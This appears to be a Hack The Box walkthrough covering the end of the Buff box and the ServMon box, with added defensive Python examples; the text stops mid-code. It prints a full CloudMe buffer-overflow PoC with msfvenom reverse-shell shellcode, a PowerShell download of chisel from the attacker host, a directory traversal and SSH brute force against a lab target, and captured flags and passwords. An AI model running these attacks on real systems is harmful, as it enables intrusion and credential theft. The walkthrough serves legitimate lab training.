  TCP    10.10.10.198:49684     10.10.14.42:4443       ESTABLISHED
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING

---

To use the exploit, we need port forwarding.
This time, Chisel was used for the purpose.
Run a web server on the localhost, download the Windows binary onto the target machine and run it there.

On the localhost

root@kali:~# chmod +x chisel
root@kali:~# sudo ./chisel server -p 8001 --reverse -v
2020/12/29 12:52:49 server: Reverse tunnelling enabled
2020/12/29 12:52:49 server: Fingerprint 8fU8yodGKrxrXrjHCh9cAFAWAccwXWRyHQJCACbgB1g=
2020/12/29 12:52:49 server: Listening on http://0.0.0.0:8001

root@kali:~# ls | grep chisel
chisel
chisel.exe

root@kali:~# python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the target machine

C:\Users\shaun\Downloads>powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/chisel.exe -OutFile chisel.exe
powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/chisel.exe -OutFile chisel.exe

C:\Users\shaun\Downloads>chisel.exe client 10.10.14.42:8001 R:8888:127.0.0.1:8888
chisel.exe client 10.10.14.42:8001 R:8888:127.0.0.1:8888
2020/12/29 04:03:11 client: Connecting to ws://10.10.14.42:8001
2020/12/29 04:03:13 client: Connected (Latency 244.1625ms)

On the localhost

root@kali:~# sudo ./chisel server -p 8001 --reverse -v
2020/12/29 12:52:49 server: Reverse tunnelling enabled
2020/12/29 12:52:49 server: Fingerprint 8fU8yodGKrxrXrjHCh9cAFAWAccwXWRyHQJCACbgB1g=
2020/12/29 12:52:49 server: Listening on http://0.0.0.0:8001
2020/12/29 12:55:09 server: session#1: Handshaking...
2020/12/29 12:55:10 server: session#1: Verifying configuration
2020/12/29 12:55:10 server: session#1: tun: Created
2020/12/29 12:55:10 server: session#1: tun: SSH connected
2020/12/29 12:55:10 server: session#1: tun: proxy#R:8888=>8888: Listening
2020/12/29 12:55:10 server: session#1: tun: Bound proxies

On the localhost (another window)

root@kali:~# ss -antp | grep 8888
LISTEN 0      4096                      *:8888                      *:*     users:(("chisel",pid=117962,fd=8))   
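
The netstat output above explains why the scan missed CloudMe (8888 is bound to 127.0.0.1) and the chisel forward R:8888:127.0.0.1:8888 shows why that bind alone protects nothing once there is a foothold on the box. As an added example (not part of the original walkthrough), this parser reads a constructed copy of that netstat output and reports loopback-only listeners plus established connections the host itself opened to peers outside its own network, which is how the nc64.exe reverse shell to 10.10.14.42:4443 (and a chisel client session) appear from the inside. The trusted network 10.10.10.0/24 is an assumption.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample: a subset of the `netstat -an` output shown above,
# reproduced here as test input for the parser.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING
  TCP    10.10.10.198:49684     10.10.14.42:4443       ESTABLISHED
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING
"""

# One netstat row: protocol, local endpoint, foreign endpoint, optional state
# (UDP rows have no state column on Windows).
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def split_endpoint(endpoint):
    """'10.10.14.42:4443' -> ('10.10.14.42', 4443); also handles '[::1]:8080'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text):
    """Parse `netstat -an` text into a list of socket dicts."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # banner, blank and header lines
        proto, local, foreign, state = m.groups()
        lhost, lport = split_endpoint(local)
        fhost, fport = split_endpoint(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport, "state": state or ""})
    return rows


def loopback_only_listeners(rows):
    """Listening ports bound to a loopback address only.

    These never show up in a remote port scan (port 8888 here), but any
    tunnel from a foothold on the box, such as the chisel reverse forward
    R:8888:127.0.0.1:8888 used above, makes them reachable again. A
    loopback bind is therefore not a substitute for patching the service.
    """
    return sorted(r["lport"] for r in rows
                  if r["state"] == "LISTENING" and ip_address(r["lhost"]).is_loopback)


def outbound_sessions(rows, trusted_nets=("10.10.10.0/24",)):
    """ESTABLISHED sockets the host itself opened (ephemeral local port) to a
    peer outside the trusted networks. A server rarely does this; the
    nc64.exe reverse shell to 10.10.14.42:4443 above is exactly this shape,
    and a chisel client session to its server would look the same.
    trusted_nets is an assumption for this example."""
    nets = [ip_network(n) for n in trusted_nets]
    flagged = []
    for r in rows:
        if r["state"] != "ESTABLISHED" or r["lport"] < 49152:
            continue
        peer = ip_address(r["fhost"])
        if not any(peer in n for n in nets):
            flagged.append(r)
    return flagged


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    print("loopback-only listeners:", loopback_only_listeners(rows))
    for r in outbound_sessions(rows):
        print(f"outbound session {r['lhost']}:{r['lport']} -> {r['fhost']}:{r['fport']}")
```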

We need to replace the payload in the PoC script.
Run the following command to generate it.

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes

Put the payload into the exploit, launch a netcat listener and execute the exploit code.
We can obtain a shell as SYSTEM.

root@kali:~# cat 48389.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python
payload =  b""
payload += b"\xb8\xbd\xb5\xf0\x16\xda\xc8\xd9\x74\x24\xf4\x5a"
payload += b"\x2b\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x57"
payload += b"\x49\x12\xe3\x5b\x5a\x51\x0c\xa3\x9b\x36\x84\x46"
payload += b"\xaa\x76\xf2\x03\x9d\x46\x70\x41\x12\x2c\xd4\x71"
payload += b"\xa1\x40\xf1\x76\x02\xee\x27\xb9\x93\x43\x1b\xd8"
payload += b"\x17\x9e\x48\x3a\x29\x51\x9d\x3b\x6e\x8c\x6c\x69"
payload += b"\x27\xda\xc3\x9d\x4c\x96\xdf\x16\x1e\x36\x58\xcb"
payload += b"\xd7\x39\x49\x5a\x63\x60\x49\x5d\xa0\x18\xc0\x45"
payload += b"\xa5\x25\x9a\xfe\x1d\xd1\x1d\xd6\x6f\x1a\xb1\x17"
payload += b"\x40\xe9\xcb\x50\x67\x12\xbe\xa8\x9b\xaf\xb9\x6f"
payload += b"\xe1\x6b\x4f\x6b\x41\xff\xf7\x57\x73\x2c\x61\x1c"
payload += b"\x7f\x99\xe5\x7a\x9c\x1c\x29\xf1\x98\x95\xcc\xd5"
payload += b"\x28\xed\xea\xf1\x71\xb5\x93\xa0\xdf\x18\xab\xb2"
payload += b"\xbf\xc5\x09\xb9\x52\x11\x20\xe0\x3a\xd6\x09\x1a"
payload += b"\xbb\x70\x19\x69\x89\xdf\xb1\xe5\xa1\xa8\x1f\xf2"
payload += b"\xc6\x82\xd8\x6c\x39\x2d\x19\xa5\xfe\x79\x49\xdd"
payload += b"\xd7\x01\x02\x1d\xd7\xd7\x85\x4d\x77\x88\x65\x3d"
payload += b"\x37\x78\x0e\x57\xb8\xa7\x2e\x58\x12\xc0\xc5\xa3"
payload += b"\xf5\xe5\x13\xa5\x2f\x92\x21\xb9\x3e\x3e\xaf\x5f"
payload += b"\x2a\xae\xf9\xc8\xc3\x57\xa0\x82\x72\x97\x7e\xef"
payload += b"\xb5\x13\x8d\x10\x7b\xd4\xf8\x02\xec\x14\xb7\x78"
payload += b"\xbb\x2b\x6d\x14\x27\xb9\xea\xe4\x2e\xa2\xa4\xb3"
payload += b"\x67\x14\xbd\x51\x9a\x0f\x17\x47\x67\xc9\x50\xc3"
payload += b"\xbc\x2a\x5e\xca\x31\x16\x44\xdc\x8f\x97\xc0\x88"
payload += b"\x5f\xce\x9e\x66\x26\xb8\x50\xd0\xf0\x17\x3b\xb4"
payload += b"\x85\x5b\xfc\xc2\x89\xb1\x8a\x2a\x3b\x6c\xcb\x55"
payload += b"\xf4\xf8\xdb\x2e\xe8\x98\x24\xe5\xa8\xa9\x6e\xa7"
payload += b"\x99\x21\x37\x32\x98\x2f\xc8\xe9\xdf\x49\x4b\x1b"
payload += b"\xa0\xad\x53\x6e\xa5\xea\xd3\x83\xd7\x63\xb6\xa3"
payload += b"\x44\x83\x93"


overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    # the published PoC printed sys.exc_value (Python 2 only, and sys was never imported);
    # printing the caught exception gives the same information on Python 3
    print(e)

Localhost

root@kali:~# nc -nlvp 4444
Listening on 0.0.0.0 4444

Localhost (another window)

root@kali:~# python 48389.py 

Localhost (netcat window)

root@kali:~# nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

As always, root.txt is in the directory C:\Users\Administrator\Desktop.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c4d1a59966243bf66b7f1fda07f2ead9

Hackthebox ServMon Walkthrough


Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box ServMon.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:/# nmap -p- 10.10.10.184 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-13 09:19 JST
Nmap scan report for 10.10.10.184
Host is up (0.26s latency).
Not shown: 65507 closed ports
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  11:05AM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open     ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
3903/tcp  filtered charsetmgr
5040/tcp  open     unknown
5166/tcp  filtered winpcs
5635/tcp  filtered sfmsso
5666/tcp  open     tcpwrapped
6063/tcp  open     tcpwrapped
6699/tcp  open     napster?
7680/tcp  open     pando-pub?
8443/tcp  open     ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|_    :Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
13864/tcp filtered unknown
14519/tcp filtered unknown
44832/tcp filtered unknown
46769/tcp filtered unknown
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
56131/tcp filtered unknown
61003/tcp filtered unknown
61971/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=12/13%Time=5FD56463%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturday\0\0
SF:\0s\0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"HTTP/1
SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r
SF:(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\
SF:nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nConte
SF:nt-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTT
SF:P/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found"
SF:);
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7m26s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-13T00:56:28
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1771.40 seconds

FTP Enumeration:

root@kali:/# wget -r ftp://anonymous@10.10.10.184

---

root@kali:/# find 10.10.10.184/ -type f
10.10.10.184/Users/Nadine/Confidential.txt
10.10.10.184/Users/Nathan/Notes to do.txt

---

root@kali:/# cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

---

root@kali:/# cat 10.10.10.184/Users/Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

SMB Enumeration:

root@kali:/# smbmap -H 10.10.10.184
[!] Authentication error on 10.10.10.184
root@kali:/# smbmap -H 10.10.10.184 -u null
[!] Authentication error on 10.10.10.184

Gobuster Port 80:

root@kali:/# gobuster dir -u http://10.10.10.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.184
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/13 09:56:21 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.184/31065b41-6087-4b6a-aeb3-8be56ccbac20 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch

Gobuster Port 8443:

root@kali:/# gobuster dir -u http://10.10.10.184:8443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.184:8443
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/13 10:06:57 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.184:8443/: Get http://10.10.10.184:8443/: read tcp 10.10.14.42:44940->10.10.10.184:8443: read: connection reset by peer

2. Getting User

Taking a look at http://10.10.10.184, we find a login console for NVMS-1000.

Search for known vulnerabilities using Searchsploit.
We find directory traversal vulnerabilities for NVMS 1000.

root@kali:/# searchsploit nvms
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal                                     | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification    | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                  | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                 | hardware/webapps/48311.py
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Metasploit has a module for this vulnerability.
First, try to retrieve /windows/win.ini as a harmless proof that the traversal works.

msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set filepath /windows/win.ini
filepath => /windows/win.ini
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run

[+] 10.10.10.184:80 - Downloaded 92 bytes
[+] File saved in: /root/.msf4/loot/20201213101747_default_10.10.10.184_nvms.traversal_963898.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

---

root@kali:/# cat /root/.msf4/loot/20201213101747_default_10.10.10.184_nvms.traversal_963898.txt
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Next, try to get /Users/Nathan/desktop/passwords.txt, the file mentioned in the note found during FTP enumeration.
We obtain a list of possible passwords.

msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set filepath /users/nathan/desktop/passwords.txt
filepath => /users/nathan/desktop/passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run

[+] 10.10.10.184:80 - Downloaded 156 bytes
[+] File saved in: /root/.msf4/loot/20201213102411_default_10.10.10.184_nvms.traversal_836293.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

---

root@kali:/# cat /root/.msf4/loot/20201213102411_default_10.10.10.184_nvms.traversal_836293.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
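
The traversal used above works because the server joins the request path onto its web root without normalising it. The following is an added example, not code from the page or from NVMS-1000, showing that flawed pattern beside a hardened resolver that decodes, normalises and then refuses any path that leaves the web root; the web root `/srv/nvms/www` is a constructed placeholder.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed web root for the demonstration; NVMS-1000's real layout is not
# reproduced here.
WEB_ROOT = "/srv/nvms/www"


def vulnerable_resolve(web_root: str, requested: str) -> str:
    """The flawed pattern: the request path is glued onto the web root with no
    normalisation, so '../' segments in it walk up and out of the web root."""
    return web_root.rstrip("/") + "/" + unquote(requested).lstrip("/")


def safe_resolve(web_root: str, requested: str) -> Optional[str]:
    """Hardened resolution: decode, normalise, then keep the path only if it is
    still inside the web root. Returns None for anything that escapes."""
    root = os.path.normpath(web_root)
    # Decode percent-encoding first so '..%2f' is checked as '../', treat
    # backslashes as separators too (Windows servers accept both), and drop any
    # leading slash so the request cannot name an absolute path.
    cleaned = unquote(requested).replace("\\", "/").lstrip("/")
    candidate = os.path.normpath(os.path.join(root, cleaned))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def is_traversal(web_root: str, requested: str) -> bool:
    """True when safe_resolve would reject the request; this is the condition an
    access-log review or WAF rule should alert on."""
    return safe_resolve(web_root, requested) is None


if __name__ == "__main__":
    for req in ["index.html", "../../../windows/win.ini", "..%2f..%2f..%2fwindows%2fwin.ini"]:
        print(f"{req!r:42} vulnerable -> {vulnerable_resolve(WEB_ROOT, req)}")
        print(f"{'':42} safe       -> {safe_resolve(WEB_ROOT, req)}")
```

The prefix check compares against `root + os.sep`, not `root` alone, so a sibling directory such as `/srv/nvms/www-old` is not mistaken for a path inside the web root.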

Then, create the following username and password lists.

root@kali:/# cat users.txt 
nadine
nathan

root@kali:/# cat passwords.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Using the lists we created, try to brute-force the SSH service.
We find a valid credential, nadine:L1k3B1gBut7s@W0rk.

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file users.txt
user_file => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' ''id' is not recognized as an internal or external command,  operable program or batch file.  '
[*] Command shell session 1 opened (10.10.14.42:35027 -> 10.10.10.184:22) at 2020-12-13 10:29:27 +0900
[-] 10.10.10.184:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now we already have an active session as Nadine (opened by the Metasploit module).

msf6 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami
whoami
servmon\nadine

nadine@SERVMON C:\Users\Nadine>

user.txt is in the directory C:\Users\Nadine\Desktop.

nadine@SERVMON C:\Users\Nadine>type .\desktop\user.txt
type .\desktop\user.txt
db18154361a424fdba2ec9985560b178

3. Getting Root

As always, check what software is installed.
This time, focus on NSClient++, which is not installed by default.

nadine@SERVMON C:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files

08/04/2020  22:21    <DIR>          .
08/04/2020  22:21    <DIR>          ..
08/04/2020  22:21    <DIR>          Common Files
08/04/2020  22:18    <DIR>          Internet Explorer
19/03/2019  04:52    <DIR>          ModifiableWindowsApps
16/01/2020  18:11    <DIR>          NSClient++
08/04/2020  22:09    <DIR>          Reference Assemblies
23/07/2020  12:59    <DIR>          UNP
14/01/2020  08:14    <DIR>          VMware
08/04/2020  21:31    <DIR>          Windows Defender
08/04/2020  21:45    <DIR>          Windows Defender Advanced Threat Protection
19/03/2019  04:52    <DIR>          Windows Mail
19/03/2019  11:43    <DIR>          Windows Multimedia Platform
19/03/2019  05:02    <DIR>          Windows NT
19/03/2019  11:43    <DIR>          Windows Photo Viewer
19/03/2019  11:43    <DIR>          Windows Portable Devices
19/03/2019  04:52    <DIR>          Windows Security
19/03/2019  04:52    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  27,728,986,112 bytes free

Taking a look at the folder, we find a config file, nsclient.ini.

nadine@SERVMON C:\Program Files>dir .\NSClient++
dir .\NSClient++
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files\NSClient++

16/01/2020  18:11    <DIR>          .
16/01/2020  18:11    <DIR>          ..
09/12/2015  00:17            28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015  00:17            50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015  00:17           117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015  00:22           439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015  00:23           256,000 boost_python-vc110-mt-1_58.dll
09/12/2015  00:17           765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015  00:16            19,456 boost_system-vc110-mt-1_58.dll
09/12/2015  00:18           102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020  13:24                51 boot.ini
18/01/2018  15:51           157,453 changelog.txt
28/01/2018  22:33         1,210,392 check_nrpe.exe
08/04/2020  09:48    <DIR>          crash-dumps
05/11/2017  21:09           318,464 Google.ProtocolBuffers.dll
08/12/2015  23:16         1,655,808 libeay32.dll
05/11/2017  22:04            18,351 license.txt
05/10/2017  07:19           203,264 lua.dll
14/01/2020  13:24    <DIR>          modules
10/04/2020  18:32             2,683 nsclient.ini
13/12/2020  02:26            30,930 nsclient.log
05/11/2017  21:42            55,808 NSCP.Core.dll
28/01/2018  22:32         4,765,208 nscp.exe
05/11/2017  21:42           483,328 NSCP.Protobuf.dll
19/11/2017  16:18           534,016 nscp_json_pb.dll
19/11/2017  15:55         2,090,496 nscp_lua_pb.dll
23/01/2018  20:57           507,904 nscp_mongoose.dll
19/11/2017  15:49         2,658,304 nscp_protobuf.dll
05/11/2017  22:04             3,921 old-settings.map
28/01/2018  22:21         1,973,760 plugin_api.dll
23/05/2015  08:44         3,017,216 python27.dll
27/09/2015  15:42        28,923,515 python27.zip
28/01/2018  22:34           384,536 reporter.exe
14/01/2020  13:24    <DIR>          scripts
14/01/2020  13:24    <DIR>          security
08/12/2015  23:16           348,160 ssleay32.dll
23/05/2015  08:44           689,664 unicodedata.pyd
14/01/2020  13:24    <DIR>          web
05/11/2017  21:20         1,273,856 where_filter.dll
23/05/2015  08:44            47,616 _socket.pyd
              33 File(s)     53,134,928 bytes
               7 Dir(s)  27,728,986,112 bytes free

The config file nsclient.ini contains a lot of information.
What we need to know is the following.

  1. The password is ew2x6SsGTxjRwXOT
  2. The only allowed host is 127.0.0.1

nadine@SERVMON C:\Program Files>type .\NSClient++\nsclient.ini
type .\NSClient++\nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
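
What makes this configuration exploitable is the combination of settings rather than any single key: a readable cleartext password, a loopback-only allowlist that a local user (or an SSH port forward) satisfies, the web API enabled, and external scripts enabled with arguments allowed. The following is an added example, not NSClient++ code or anything from the box: a small audit that parses an nsclient.ini and reports that combination, run over a constructed sample modelled on the file above and over a constructed hardened counterpart (the monitoring-server address 10.0.0.5 in it is made up).

```python
import configparser
from typing import List

# Constructed sample modelled on the nsclient.ini shown above; it keeps only the
# keys the audit looks at and is not the box's file.
SAMPLE_INI = """\
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
NRPEServer = enabled
CheckExternalScripts = enabled

[/settings/external scripts/wrappings]
ps1 = cmd /c echo scripts\\%SCRIPT% $ARGS$ | powershell.exe /noprofile -command -

[/settings/external scripts]
allow arguments = true
"""

# Constructed hardened counterpart: web API off, external scripts off, and the
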